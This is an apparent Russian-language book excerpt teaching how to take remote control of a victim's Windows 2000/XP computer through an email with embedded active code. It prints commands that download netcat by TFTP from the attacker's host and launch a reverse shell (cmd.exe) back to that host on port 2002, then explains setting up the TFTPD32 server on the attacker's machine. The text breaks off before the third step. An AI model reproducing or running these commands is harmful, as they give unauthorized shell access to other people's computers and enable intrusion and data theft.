Установление удаленного контроля

Мы уже говорили, что наилучшим способом доступа к ресурсам жертвенного компьютера является следующий: в него следует загрузить программу-сервер удаленного управления (например, трояна) и запустить загруженную программу, причем сделав ее функционирование незаметным для пользователя компьютера. Хакер должен получить возможность связываться со своего компьютера с программой-сервером и отдавать ей команды с помощью программы-клиента удаленного управления.

В описываемой далее атаке для загрузки сервера удаленного управления используется программа TFTPD32, загружающая на комьпютер-жертву файл nc.exe программы-сервера удаленного управления netcat. Управление атакованным компьютером будет выполняться по командам MS-DOS, отдаваемым с хакерского компьютера, на котором исполняется та же самая программа netcat, но работающая в режиме клиента. Рассмотрим атаку детальнее.

На первом шаге создадим текстовый файл attack-tftp.txt с MIME-кодом, приведенный в листинге:

Активный код в этом письме таков:

start /B /WAIT tftp -i alex-3.sword.net get nc.exe C:\winnt\system32\nc.exe

start /B nc.exe -d -e cmd.exe alex-3.sword.net 2002

Кратко опишем содержание активного кода. Команда в первой строке апускает сеанс MS-DOS в режиме без создания нового диалога сеанса MS-DOS (параметр /B команды start) и в режиме ожидания завершения команды (параметр /WAIT команды start). В открывшемся сеансе MS-DOS вначале исполняется команда tftp, которая предназначена для выгрузки файлов из удаленного хоста в локальный компьютер (параметр put) и загрузки файлов из удаленного хоста в локальный компьютер (параметр get). (Подробнее с командой tftp можно познакомиться по справке Windows 2000/XP). В нашем случае команды tftp загружает двоичный код (параметр -i) файла nc.exe с хакерского компьютера по адресу alex-3.sword.net в папку c:\winnt\system32 локального компьютера.

Вторая строка содержит команду запуска загруженной программы-сервера netcat, которая запускает командную оболочку cmd.exe атакованного компьютера и устанавливает соединение с программой-клиентом netcat, запущенной на хакерском компьютере в режиме прослушивания порта 2002.

Вот как это все работает. Подготовив файл attack-tftp.txt с MIME-кодом из листинга выше, этот неугомонный хакер Петя приступает к следующему шагу. На своем компютере Alex-3 он запускает программу TFTPD32, представляющую собой клиент TFTP, т.е. программу, обслуживающую запросы TFTP. Причина использования TFTPD32 состоит в том, что на компьютерах Windows 2000/XP, в отличие от UNIX, протокол TFTP поддерживается в ограниченном объеме, и для исполнения комады tftp на компьютере, из которого мы собираемся загрузить файл, должен быть установлен клиент tftp - иначе команда исполнена не будет. Таким образом, мы запускаем программу TFTPD32 и нам отображается диалог представленный на Рис. 2.

Клиент TFPD32 должен быть настроен следующим образом. В поле Current Directory (Основной каталог) следует указать папку с файлом nc.exe, а в открывающемся списке Server interface (Серверный интерфейс) следует ввести IP-адрес сетевого компьютера, с которого будет выполняться загрузка файла, в нашем случае указан IP-адрес компьютера Alex-3. Как видно из Рис. 2, после запуска и настройки программа TFPD32 прослушивает стандартынй порт 69 протокола TFTP в ожидании запросов.

Рис. 2. Диалог клиента TFTP - программы TFPTD32

На третьем шаге хакер Петя в отдельном диалоге сеанса MS-DOS запускает следующую программу-клиент удаленного управления: